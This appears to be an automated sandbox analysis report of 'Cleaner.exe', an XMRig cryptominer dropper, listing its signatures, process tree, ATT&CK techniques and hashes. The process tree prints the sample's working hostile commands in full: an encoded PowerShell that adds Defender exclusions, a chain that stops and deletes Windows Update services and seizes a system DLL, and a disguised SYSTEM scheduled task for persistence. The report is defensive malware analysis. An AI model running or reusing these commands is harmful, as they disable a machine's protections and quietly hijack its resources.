Analysis

  • max time kernel
    151s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    06-05-2022 09:42

General

  • Target

    Cleaner.exe

  • Size

    2.5MB

  • MD5

    dbd1ed5d49db4a7042a7972e31e062bc

  • SHA1

    f792cf6a1ed7f4ed8eebce2c09416f9d8764fe30

  • SHA256

    f691787d560b58a0b92c6aa24732112cf0a8f57dd813aa1f3101d0fa73925be6

  • SHA512

    6e72f161108640fbe9ef312131f6ca443c78167b5db39e34f63c89bc77771205f8c25f145684db38c36569de9b1f524ab69c1161636d0bbd6cc098e2c4a35cb8

Malware Config

Signatures

  • Modifies security service 2 TTPs 5 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 5 IoCs
  • Executes dropped EXE 1 IoCs
  • Possible privilege escalation attempt 4 IoCs
  • Stops running service(s) 3 TTPs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Modifies file permissions 1 TTPs 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 55 IoCs
  • Modifies registry key 1 TTPs 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Cleaner.exe
    "C:\Users\Admin\AppData\Local\Temp\Cleaner.exe"
    1⤵
    • Checks computer location settings
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4812
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHQAdgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG8AYQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAYgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB4AGgAIwA+AA=="
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3824
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -EncodedCommand "PAAjAHQAdgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG8AYQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAYgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB4AGgAIwA+AA=="
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4560
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4496
      • C:\Windows\system32\sc.exe
        sc stop UsoSvc
        3⤵
          PID:1988
        • C:\Windows\system32\sc.exe
          sc stop WaaSMedicSvc
          3⤵
            PID:3164
          • C:\Windows\system32\sc.exe
            sc stop wuauserv
            3⤵
              PID:4392
            • C:\Windows\system32\sc.exe
              sc stop bits
              3⤵
                PID:3556
              • C:\Windows\system32\sc.exe
                sc stop dosvc
                3⤵
                  PID:348
                • C:\Windows\system32\reg.exe
                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                  3⤵
                  • Modifies registry key
                  PID:2544
                • C:\Windows\system32\reg.exe
                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                  3⤵
                  • Modifies registry key
                  PID:1708
                • C:\Windows\system32\reg.exe
                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                  3⤵
                  • Modifies security service
                  • Modifies registry key
                  PID:4912
                • C:\Windows\system32\reg.exe
                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                  3⤵
                  • Modifies registry key
                  PID:4380
                • C:\Windows\system32\reg.exe
                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                  3⤵
                  • Modifies registry key
                  PID:1048
                • C:\Windows\system32\takeown.exe
                  takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                  3⤵
                  • Possible privilege escalation attempt
                  • Modifies file permissions
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1460
                • C:\Windows\system32\icacls.exe
                  icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                  3⤵
                  • Possible privilege escalation attempt
                  • Modifies file permissions
                  PID:5116
                • C:\Windows\system32\reg.exe
                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                  3⤵
                  • Modifies registry key
                  PID:1200
                • C:\Windows\system32\reg.exe
                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                  3⤵
                  • Modifies registry key
                  PID:988
                • C:\Windows\system32\reg.exe
                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                  3⤵
                  • Modifies registry key
                  PID:1308
                • C:\Windows\system32\reg.exe
                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                  3⤵
                  • Modifies registry key
                  PID:3388
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                  3⤵
                    PID:2624
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                    3⤵
                      PID:1716
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                      3⤵
                        PID:2752
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                        3⤵
                          PID:2800
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                          3⤵
                            PID:976
                          • C:\Windows\system32\schtasks.exe
                            SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                            3⤵
                              PID:920
                            • C:\Windows\system32\schtasks.exe
                              SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                              3⤵
                                PID:3632
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                              2⤵
                              • Suspicious use of WriteProcessMemory
                              PID:368
                              • C:\Windows\system32\powercfg.exe
                                powercfg /x -hibernate-timeout-ac 0
                                3⤵
                                • Suspicious use of AdjustPrivilegeToken
                                PID:264
                              • C:\Windows\system32\powercfg.exe
                                powercfg /x -hibernate-timeout-dc 0
                                3⤵
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4576
                              • C:\Windows\system32\powercfg.exe
                                powercfg /x -standby-timeout-ac 0
                                3⤵
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2480
                              • C:\Windows\system32\powercfg.exe
                                powercfg /x -standby-timeout-dc 0
                                3⤵
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3504
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '^"C:\Program Files\Windows\Chrome\updater.exe^"'
                              2⤵
                              • Suspicious use of WriteProcessMemory
                              PID:4300
                              • C:\Windows\system32\schtasks.exe
                                schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '"C:\Program Files\Windows\Chrome\updater.exe"'
                                3⤵
                                • Creates scheduled task(s)
                                PID:4628
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
                              2⤵
                                PID:2400
                                • C:\Windows\system32\schtasks.exe
                                  schtasks /run /tn "GoogleUpdateTaskMachineQC"
                                  3⤵
                                    PID:1524
                              • C:\Program Files\Windows\Chrome\updater.exe
                                "C:\Program Files\Windows\Chrome\updater.exe"
                                1⤵
                                • Executes dropped EXE
                                • Drops file in System32 directory
                                • Suspicious use of SetThreadContext
                                • Drops file in Program Files directory
                                • Modifies data under HKEY_USERS
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4016
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHQAdgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG8AYQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAYgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB4AGgAIwA+AA=="
                                  2⤵
                                    PID:3152
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -EncodedCommand "PAAjAHQAdgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG8AYQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAYgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB4AGgAIwA+AA=="
                                      3⤵
                                      • Drops file in System32 directory
                                      • Modifies data under HKEY_USERS
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:536
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                    2⤵
                                      PID:4952
                                      • C:\Windows\system32\sc.exe
                                        sc stop UsoSvc
                                        3⤵
                                          PID:3068
                                        • C:\Windows\system32\sc.exe
                                          sc stop WaaSMedicSvc
                                          3⤵
                                            PID:3424
                                          • C:\Windows\system32\sc.exe
                                            sc stop wuauserv
                                            3⤵
                                              PID:2032
                                            • C:\Windows\system32\sc.exe
                                              sc stop bits
                                              3⤵
                                                PID:4700
                                              • C:\Windows\system32\sc.exe
                                                sc stop dosvc
                                                3⤵
                                                  PID:2336
                                                • C:\Windows\system32\reg.exe
                                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                                                  3⤵
                                                  • Modifies registry key
                                                  PID:4596
                                                • C:\Windows\system32\reg.exe
                                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                                                  3⤵
                                                  • Modifies registry key
                                                  PID:4456
                                                • C:\Windows\system32\reg.exe
                                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                                                  3⤵
                                                  • Modifies registry key
                                                  PID:4248
                                                • C:\Windows\system32\reg.exe
                                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                                                  3⤵
                                                  • Modifies registry key
                                                  PID:2424
                                                • C:\Windows\system32\reg.exe
                                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                                                  3⤵
                                                  • Modifies registry key
                                                  PID:4520
                                                • C:\Windows\system32\takeown.exe
                                                  takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                                  3⤵
                                                  • Possible privilege escalation attempt
                                                  • Modifies file permissions
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:4472
                                                • C:\Windows\system32\icacls.exe
                                                  icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                                                  3⤵
                                                  • Possible privilege escalation attempt
                                                  • Modifies file permissions
                                                  PID:4264
                                                • C:\Windows\system32\reg.exe
                                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                                                  3⤵
                                                  • Modifies registry key
                                                  PID:2460
                                                • C:\Windows\system32\reg.exe
                                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                                                  3⤵
                                                  • Modifies registry key
                                                  PID:4052
                                                • C:\Windows\system32\reg.exe
                                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                                                  3⤵
                                                  • Modifies registry key
                                                  PID:1056
                                                • C:\Windows\system32\reg.exe
                                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                                                  3⤵
                                                  • Modifies registry key
                                                  PID:1360
                                                • C:\Windows\system32\schtasks.exe
                                                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                                                  3⤵
                                                    PID:5064
                                                  • C:\Windows\system32\schtasks.exe
                                                    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                                                    3⤵
                                                      PID:4400
                                                    • C:\Windows\system32\schtasks.exe
                                                      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                                                      3⤵
                                                        PID:2020
                                                      • C:\Windows\system32\schtasks.exe
                                                        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                                                        3⤵
                                                          PID:1756
                                                        • C:\Windows\system32\schtasks.exe
                                                          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                                                          3⤵
                                                            PID:4236
                                                          • C:\Windows\system32\schtasks.exe
                                                            SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                                                            3⤵
                                                              PID:1076
                                                            • C:\Windows\system32\schtasks.exe
                                                              SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                                              3⤵
                                                                PID:3780
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                              2⤵
                                                                PID:808
                                                                • C:\Windows\system32\powercfg.exe
                                                                  powercfg /x -hibernate-timeout-ac 0
                                                                  3⤵
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:3536
                                                                • C:\Windows\system32\powercfg.exe
                                                                  powercfg /x -hibernate-timeout-dc 0
                                                                  3⤵
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:3712
                                                                • C:\Windows\system32\powercfg.exe
                                                                  powercfg /x -standby-timeout-ac 0
                                                                  3⤵
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:684
                                                                • C:\Windows\system32\powercfg.exe
                                                                  powercfg /x -standby-timeout-dc 0
                                                                  3⤵
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:4820
                                                              • C:\Windows\System32\conhost.exe
                                                                C:\Windows\System32\conhost.exe
                                                                2⤵
                                                                  PID:932
                                                                  • C:\Windows\System32\conhost.exe
                                                                    "C:\Windows\System32\conhost.exe" "bxdoetcpshjfuf"
                                                                    3⤵
                                                                      PID:3544
                                                                  • C:\Windows\explorer.exe
                                                                    C:\Windows\explorer.exe ipwwwbzjbtvl0 Xji3FXYfqqI2timPThbgZueMNpSES88mLhMz2ywydJRha9S4YJkR8/KlqFio/vzAY7y//ZROYnArPXLiffwPB3Z0FRZu0jBByBu61ctc+oB1na2mPvSctdAZCvNSYjqxuJ9+jZO2dBGcTtltqRtfB5sis29FE8AguH8o6CZd6bm8mas+6c1fRdZPMGtCQH2foW0NS1AUT64wsPENhqV4uTo0H/V5F/ASYeMREvsY+0umqotx4ONlP8ddGQYatgAh6kK7OYcy646QnMfXYGVEjpW+rm4KbLNA0oQR2zL3uL73HuGKdXDaM+ZOVVhwrvHxPnKpXibEYXHzBnCVZQwdhVpfWnLbs/zpsVDxKUAqx2AYAKpSwmRaoN7exiSoSwjAMUFErD4i3EvVdzd42cGRPBLuP3cJA8nDTXB7SV4ArJ7DBza4VntXzsWBd6f5UJM2sV72i2/4PMabZk06BK764bA8NFT6PPwvonyyfWrLK/h9MPtBLjR4r9InJFrl+aIU0vaHtF5KlffAHx7zzO89LuQ7qoo+VAz2AYWXRKicHiTNI9eIJ43i4JzuvrxcpN9aN0p7L6b6CwRGtnOoOcIkeTBIR9gNQRxGa1PokHJa0uFlz1sPqCPJ7ZwjnOLC+l4MAmzMNN7nHGfmv+43lgAe66mEibuHRgn/byQM3aub6rWVhs3I0zo+uZl7tiiX2bo2D0L1ocES7XvKByIzK7hF3VP54li9B+b6r8JWY5Y/Ywmpmu44q4pNkIhUv658nxZetBNU/Rz8ETwJbvX4OmVqMkT7eXoNtIE4AHv9ysX/6NSaKnx0bZOxSdwvNwNkVseq/IXEEInY0TSjB+5Mhc/qCFtZ7DjO7FD6+RT9QjWoqKRjFQBusBa2T4hS3OqNFbbhkl4dy54I6qQj+WGzE0SdAKYAg8U7a659fcRzKv0HQxTjL5yDCgAGS9O9GhhYfEkEosOBCyaAI57IqENOeZzgIfDs4fmfxjzgEEcvuNSEd3ijh2izg0zLuoOBkko0Dhv9uSD16XFU9LV+iPYWc5HxPTLHJuc9Art+qBlWOVrMohoXn4h2Y/h4lPOjIVpRX0p8J9quZyqwqSE6rrb0n/p8DpTig8Qq72EkFOJclvRm5xsAMLS2XukLqnkhAsnjmrg+/KRHUfwfyrJjC3DImT7au05eMOA/UexcdajdgiMzQViTljMKaZl/sb2KKzf0ynfPk5ZBW/SZhLWVrJKA4QxsvgFY8y1t3VPOC853hTpMN1IwGMh/4YYUzBkGPEk3nbDrqHoEoh/J+JC3Et4H6kZFKsTwTx1qEd3AC3uLGoeXeUWVDoa8oKXKoRq0UqV8I2Lncic5A4p4TTCK+CT9fEpli+4ADKRSNwFnCnH9Pxctof7tqJHDlJJAJmmM6sicPU5OUxYh5XhZ5NWKxAx1fS+i9kzy/HyZ5bIi8OTg2kYvT+fBPa3tlKvWKL0+Zx2NHePChjIX0kYyuflXPMH2dIEC+5KW1KDcHJwoYEQ6V7UH6LWGJYk6LKR7T6rN+hYyp8z3ly13GhAUIMT4HNg4Lc/fZg==
                                                                    2⤵
                                                                    • Modifies data under HKEY_USERS
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:1148

                                                                Network

                                                                MITRE ATT&CK Matrix ATT&CK v6

                                                                Execution

                                                                Scheduled Task

                                                                1
                                                                T1053

                                                                Persistence

                                                                Modify Existing Service

                                                                2
                                                                T1031

                                                                Scheduled Task

                                                                1
                                                                T1053

                                                                Privilege Escalation

                                                                Scheduled Task

                                                                1
                                                                T1053

                                                                Defense Evasion

                                                                Modify Registry

                                                                2
                                                                T1112

                                                                Impair Defenses

                                                                1
                                                                T1562

                                                                File Permissions Modification

                                                                1
                                                                T1222

                                                                Discovery

                                                                Query Registry

                                                                1
                                                                T1012

                                                                System Information Discovery

                                                                2
                                                                T1082

                                                                Command and Control

                                                                Web Service

                                                                1
                                                                T1102

                                                                Impact

                                                                Service Stop

                                                                1
                                                                T1489

                                                                Replay Monitor

                                                                Loading Replay Monitor...

                                                                Downloads

                                                                • C:\Program Files\Windows\Chrome\updater.exe
                                                                  Filesize

                                                                  2.5MB

                                                                  MD5

                                                                  dbd1ed5d49db4a7042a7972e31e062bc

                                                                  SHA1

                                                                  f792cf6a1ed7f4ed8eebce2c09416f9d8764fe30

                                                                  SHA256

                                                                  f691787d560b58a0b92c6aa24732112cf0a8f57dd813aa1f3101d0fa73925be6

                                                                  SHA512

                                                                  6e72f161108640fbe9ef312131f6ca443c78167b5db39e34f63c89bc77771205f8c25f145684db38c36569de9b1f524ab69c1161636d0bbd6cc098e2c4a35cb8

                                                                • C:\Program Files\Windows\Chrome\updater.exe
                                                                  Filesize

                                                                  2.5MB

                                                                  MD5

                                                                  dbd1ed5d49db4a7042a7972e31e062bc

                                                                  SHA1

                                                                  f792cf6a1ed7f4ed8eebce2c09416f9d8764fe30

                                                                  SHA256

                                                                  f691787d560b58a0b92c6aa24732112cf0a8f57dd813aa1f3101d0fa73925be6

                                                                  SHA512

                                                                  6e72f161108640fbe9ef312131f6ca443c78167b5db39e34f63c89bc77771205f8c25f145684db38c36569de9b1f524ab69c1161636d0bbd6cc098e2c4a35cb8

                                                                • memory/264-143-0x0000000000000000-mapping.dmp
                                                                • memory/348-142-0x0000000000000000-mapping.dmp
                                                                • memory/368-137-0x0000000000000000-mapping.dmp
                                                                • memory/536-174-0x00007FFCE36D0000-0x00007FFCE4191000-memory.dmp
                                                                  Filesize

                                                                  10.8MB

                                                                • memory/536-176-0x000001DBD7010000-0x000001DBD701A000-memory.dmp
                                                                  Filesize

                                                                  40KB

                                                                • memory/536-175-0x000001DBD7230000-0x000001DBD724C000-memory.dmp
                                                                  Filesize

                                                                  112KB

                                                                • memory/536-177-0x000001DBD7470000-0x000001DBD748C000-memory.dmp
                                                                  Filesize

                                                                  112KB

                                                                • memory/536-178-0x000001DBD7020000-0x000001DBD702A000-memory.dmp
                                                                  Filesize

                                                                  40KB

                                                                • memory/536-179-0x000001DBD7490000-0x000001DBD74AA000-memory.dmp
                                                                  Filesize

                                                                  104KB

                                                                • memory/536-182-0x000001DBD74B0000-0x000001DBD74BA000-memory.dmp
                                                                  Filesize

                                                                  40KB

                                                                • memory/536-172-0x0000000000000000-mapping.dmp
                                                                • memory/536-180-0x000001DBD7450000-0x000001DBD7458000-memory.dmp
                                                                  Filesize

                                                                  32KB

                                                                • memory/536-181-0x000001DBD7460000-0x000001DBD7466000-memory.dmp
                                                                  Filesize

                                                                  24KB

                                                                • memory/684-195-0x0000000000000000-mapping.dmp
                                                                • memory/808-184-0x0000000000000000-mapping.dmp
                                                                • memory/920-165-0x0000000000000000-mapping.dmp
                                                                • memory/932-190-0x0000000000400000-0x000000000040C000-memory.dmp
                                                                  Filesize

                                                                  48KB

                                                                • memory/932-193-0x0000000000400000-0x000000000040C000-memory.dmp
                                                                  Filesize

                                                                  48KB

                                                                • memory/932-191-0x0000000000401BEA-mapping.dmp
                                                                • memory/976-164-0x0000000000000000-mapping.dmp
                                                                • memory/988-157-0x0000000000000000-mapping.dmp
                                                                • memory/1048-151-0x0000000000000000-mapping.dmp
                                                                • memory/1056-208-0x0000000000000000-mapping.dmp
                                                                • memory/1148-218-0x0000000001A50000-0x0000000001A70000-memory.dmp
                                                                  Filesize

                                                                  128KB

                                                                • memory/1148-213-0x000000014036DB84-mapping.dmp
                                                                • memory/1148-214-0x0000000140000000-0x0000000140803000-memory.dmp
                                                                  Filesize

                                                                  8.0MB

                                                                • memory/1148-216-0x0000000140000000-0x0000000140803000-memory.dmp
                                                                  Filesize

                                                                  8.0MB

                                                                • memory/1148-212-0x0000000140000000-0x0000000140803000-memory.dmp
                                                                  Filesize

                                                                  8.0MB

                                                                • memory/1148-220-0x0000000140000000-0x0000000140803000-memory.dmp
                                                                  Filesize

                                                                  8.0MB

                                                                • memory/1148-221-0x0000000001B10000-0x0000000001B30000-memory.dmp
                                                                  Filesize

                                                                  128KB

                                                                • memory/1200-156-0x0000000000000000-mapping.dmp
                                                                • memory/1308-158-0x0000000000000000-mapping.dmp
                                                                • memory/1360-209-0x0000000000000000-mapping.dmp
                                                                • memory/1460-152-0x0000000000000000-mapping.dmp
                                                                • memory/1524-168-0x0000000000000000-mapping.dmp
                                                                • memory/1708-147-0x0000000000000000-mapping.dmp
                                                                • memory/1716-161-0x0000000000000000-mapping.dmp
                                                                • memory/1988-138-0x0000000000000000-mapping.dmp
                                                                • memory/2020-219-0x0000000000000000-mapping.dmp
                                                                • memory/2032-189-0x0000000000000000-mapping.dmp
                                                                • memory/2336-196-0x0000000000000000-mapping.dmp
